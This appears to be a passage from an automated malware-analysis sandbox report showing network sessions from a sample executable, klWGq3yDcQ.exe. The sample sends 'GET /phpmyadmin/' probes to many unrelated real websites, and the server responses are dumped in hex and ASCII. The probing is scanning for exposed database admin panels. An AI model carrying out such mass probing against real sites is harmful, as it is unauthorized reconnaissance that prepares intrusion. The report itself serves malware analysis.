                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://capforge.com/wp-json/>; rel="https://api.w.org/"Set-Cookie: pbid=aaa
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC6INData Raw: 64 35 33 62 0d 0a
                                                                                                                                                                                                    Data Ascii: d53b
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC7800INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 69 74 65 6d 73 63 6f 70 65 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e
                                                                                                                                                                                                    Data Ascii: <!doctype html><html dir="ltr" lang="en-US" prefix="og: https://ogp.me/ns#" class="no-js" itemtype="https://schema.org/WebPage" itemscope><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><lin
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8192INData Raw: 2f 22 7d 2c 22 73 6f 63 69 61 6c 22 3a 7b 22 74 77 69 74 74 65 72 22 3a 22 6f 70 74 69 6d 69 7a 65 70 72 65 73 73 22 2c 22 66 61 63 65 62 6f 6f 6b 22 3a 22 6f 70 74 69 6d 69 7a 65 70 72 65 73 73 22 2c 22 67 6f 6f 67 6c 65 70 6c 75 73 22 3a 22 31 31 31 32 37 33 34 34 34 37 33 33 37 38 37 33 34 39 39 37 31 22 7d 2c 22 66 6c 6f 77 70 6c 61 79 65 72 48 54 4d 4c 35 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 70 6c 75 67 69 6e 73 5c 2f 6f 70 74 69 6d 69 7a 65 50 72 65 73 73 50 6c 75 67 69 6e 5c 2f 6c 69 62 5c 2f 6d 6f 64 75 6c 65 73 5c 2f 62 6c 6f 67 5c 2f 76 69 64 65 6f 5c 2f 66 6c 6f 77 70 6c 61 79 65 72 5c 2f 66 6c 6f 77 70 6c 61 79 65 72 2e 73 77 66 22 2c 22 66 6c 6f 77 70 6c 61 79 65
                                                                                                                                                                                                    Data Ascii: /"},"social":{"twitter":"optimizepress","facebook":"optimizepress","googleplus":"111273444733787349971"},"flowplayerHTML5":"https:\/\/capforge.com\/wp-content\/plugins\/optimizePressPlugin\/lib\/modules\/blog\/video\/flowplayer\/flowplayer.swf","flowplaye
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8192INData Raw: 65 6d 65 6e 74 6f 72 2d 64 65 66 61 75 6c 74 20 65 6c 65 6d 65 6e 74 6f 72 2d 6b 69 74 2d 32 31 31 38 22 3e 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 20 63 6c 61 73 73 3d 22 73 69 74 65 20 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 22 3e 20 3c 61 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 20 73 63 72 6f 6c 6c 2d 69 67 6e 6f 72 65 22 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 3c 68 65 61 64 65 72 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 22 20 72 6f 6c 65 3d 22 62 61 6e 6e 65 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57
                                                                                                                                                                                                    Data Ascii: ementor-default elementor-kit-2118"><div id="wrapper" class="site wp-site-blocks"> <a class="skip-link screen-reader-text scroll-ignore" href="#main">Skip to content</a><header id="masthead" class="site-header" role="banner" itemtype="https://schema.org/W
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8192INData Raw: 65 6e 75 2d 69 74 65 6d 2d 37 31 33 33 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 63 61 74 65 67 6f 72 79 2f 64 65 6e 74 61 6c 2d 70 72 61 63 74 69 63 65 2d 74 69 70 73 2f 22 3e 44 65 6e 74 61 6c 20 50 72 61 63 74 69 63 65 20 54 69 70 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 37 31 33 34 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 74 61 78 6f 6e 6f 6d 79 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 61 74 65 67 6f 72 79 20 6d 65 6e 75 2d 69 74 65 6d 2d 37 31 33 34 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 63 61 74 65 67 6f 72 79 2f 69 6e 73
                                                                                                                                                                                                    Data Ascii: enu-item-7133"><a href="https://capforge.com/category/dental-practice-tips/">Dental Practice Tips</a></li><li id="menu-item-7134" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-7134"><a href="https://capforge.com/category/ins
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8192INData Raw: 37 2d 30 2e 32 31 39 2d 31 2e 34 30 36 2d 30 2e 35 39 34 6c 2d 35 2e 33 35 39 2d 35 2e 33 34 34 63 2d 31 2e 38 32 38 20 31 2e 32 36 36 2d 34 2e 30 31 36 20 31 2e 39 33 37 2d 36 2e 32 33 34 20 31 2e 39 33 37 2d 36 2e 30 37 38 20 30 2d 31 31 2d 34 2e 39 32 32 2d 31 31 2d 31 31 73 34 2e 39 32 32 2d 31 31 20 31 31 2d 31 31 20 31 31 20 34 2e 39 32 32 20 31 31 20 31 31 63 30 20 32 2e 32 31 39 2d 30 2e 36 37 32 20 34 2e 34 30 36 2d 31 2e 39 33 37 20 36 2e 32 33 34 6c 35 2e 33 35 39 20 35 2e 33 35 39 63 30 2e 33 35 39 20 30 2e 33 35 39 20 30 2e 35 37 38 20 30 2e 38 37 35 20 30 2e 35 37 38 20 31 2e 34 30 36 7a 22 3e 3c 2f 70 61 74 68 3e 20 3c 2f 73 76 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 66 6f 72 6d 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 73 65
                                                                                                                                                                                                    Data Ascii: 7-0.219-1.406-0.594l-5.359-5.344c-1.828 1.266-4.016 1.937-6.234 1.937-6.078 0-11-4.922-11-11s4.922-11 11-11 11 4.922 11 11c0 2.219-0.672 4.406-1.937 6.234l5.359 5.359c0.359 0.359 0.578 0.875 0.578 1.406z"></path> </svg></span></div></form></div></div></se
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC8192INData Raw: 74 65 2d 68 65 61 64 65 72 2d 69 74 65 6d 2d 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 61 79 6f 75 74 2d 73 74 72 65 74 63 68 2d 66 61 6c 73 65 22 20 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 6b 61 64 65 6e 63 65 5f 63 75 73 74 6f 6d 69 7a 65 72 5f 6d 6f 62 69 6c 65 5f 6e 61 76 69 67 61 74 69 6f 6e 22 3e 3c 6e 61 76 20 69 64 3d 22 6d 6f 62 69 6c 65 2d 73 69 74 65 2d 6e 61 76 69 67 61 74 69 6f 6e 22 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 6e 61 76 69 67 61 74 69 6f 6e 20 64 72 61 77 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 20 64 72 61 77 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 70 61 72 65 6e 74 2d 74 6f 67 67 6c 65 2d 74 72 75 65 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: te-header-item-mobile-navigation mobile-navigation-layout-stretch-false" data-section="kadence_customizer_mobile_navigation"><nav id="mobile-site-navigation" class="mobile-navigation drawer-navigation drawer-navigation-parent-toggle-true" role="navigation
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC5824INData Raw: 76 65 72 74 6b 69 74 5f 62 72 6f 61 64 63 61 73 74 73 5f 72 65 6e 64 65 72 22 2c 22 64 65 62 75 67 22 3a 22 22 7d 3b 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 76 65 72 74 6b 69 74 2f 72 65 73 6f 75 72 63 65 73 2f 66 72 6f 6e 74 65 6e 64 2f 6a 73 2f 62 72 6f 61 64 63 61 73 74 73 2e 6a 73 3f 76 65 72 3d 32 2e 33 2e 37 22 20 69 64 3d 22 63 6f 6e 76 65 72 74 6b 69 74 2d 62 72 6f 61 64 63 61 73 74 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 61 70 66 6f 72 67 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f
                                                                                                                                                                                                    Data Ascii: vertkit_broadcasts_render","debug":""};</script> <script src="https://capforge.com/wp-content/plugins/convertkit/resources/frontend/js/broadcasts.js?ver=2.3.7" id="convertkit-broadcasts-js"></script> <script src="https://capforge.com/wp-content/plugins/co
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC3INData Raw: 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: ml>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    35192.168.2.453665199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC187OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC1135INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveDate: Sun, 26 Nov 2023 05:59:30 GMTLocation: https://www.gatewaytoearlylearning.com/phpmyadminSet-Cookie: publis
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC607INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 5a 43 4c 30 68 76 59 6d 5a 72 52 32 52 47 56 31 52 68 54 45 74 72 57 6b 34 33 55 57 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 62 56 6f 79 52 6d 64 33 54 58 51 7a 53 56 59 78 51 54 42 6f 61 47 63 35 4d 6d 52 4d 53 31 46 56 51 30 35 53 53 7a 68 71 55 55 6c 69 54 58 46 44 55 6b 59 7a 62 6b 4a 45 55 56 56 34 55 48 42 35 4f 44 42 48 4e 6e 70 4c 52 54 52 6a 53 6c 4e 48 4f 47 39 69 59 32 68 51 52 6a 5a 56 4d 45 39 32 54 56 70 58 61 6e 63 35 4e 45 4e 5a 56 44 52 73 59 6d 39 53 4d 31 46 76 51 57 70 57 59 33 4a 73 61 47 5a 7a 64 53 39 4a 5a 57 68 59 65 47 68 57 4d 54 6c 4b 53 55 52 4f 56 58 67 77 52 54 64 74 4c 31 4a 76 65 45
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6IlZCL0hvYmZrR2RGV1RhTEtrWk43UWc9PSIsInZhbHVlIjoibVoyRmd3TXQzSVYxQTBoaGc5MmRMS1FVQ05SSzhqUUliTXFDUkYzbkJEUVV4UHB5ODBHNnpLRTRjSlNHOG9iY2hQRjZVME92TVpXanc5NENZVDRsYm9SM1FvQWpWY3JsaGZzdS9JZWhYeGhWMTlKSUROVXgwRTdtL1JveE
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC454INData Raw: 31 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 74 65 77 61 79 74 6f 65 61 72 6c 79 6c 65 61 72 6e 69 6e 67 2e 63 6f 6d 2f 70 68 70 6d 79 61 64
                                                                                                                                                                                                    Data Ascii: 1ba<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.gatewaytoearlylearning.com/phpmyadmin'" /> <title>Redirecting to https://www.gatewaytoearlylearning.com/phpmyad


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    36192.168.2.45516015.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC15911INData Raw: 37 39 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7970<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC15190INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/">


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    37192.168.2.45505295.168.220.2104436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: beachrecruitment.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC689INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 30 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 6b 38 73 70 65 72 73 69 73 74 65 6e 74 3d 64 62 63 65 30 34 33 66 64 35 37 37 33 65 34 36 31 31 35 39 30 35 63 66 31 61 36 39 39 32 62 38 7c 31 31 66 31 38 37 36 33 38 36 34 33 65 31 33 64 37 62 64 31 39 36 33 39 39 31 66 61 63 35 32 62 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 32 38 2d 4e 6f 76 2d 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:30 GMTcontent-type: text/html; charset=utf-8content-length: 0set-cookie: k8spersistent=dbce043fd5773e46115905cf1a6992b8|11f187638643e13d7bd1963991fac52b; Expires=Tue, 28-Nov-23 05:59:30 GM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    38192.168.2.45517854.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC173OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:30 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    39192.168.2.455227185.230.63.1864436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
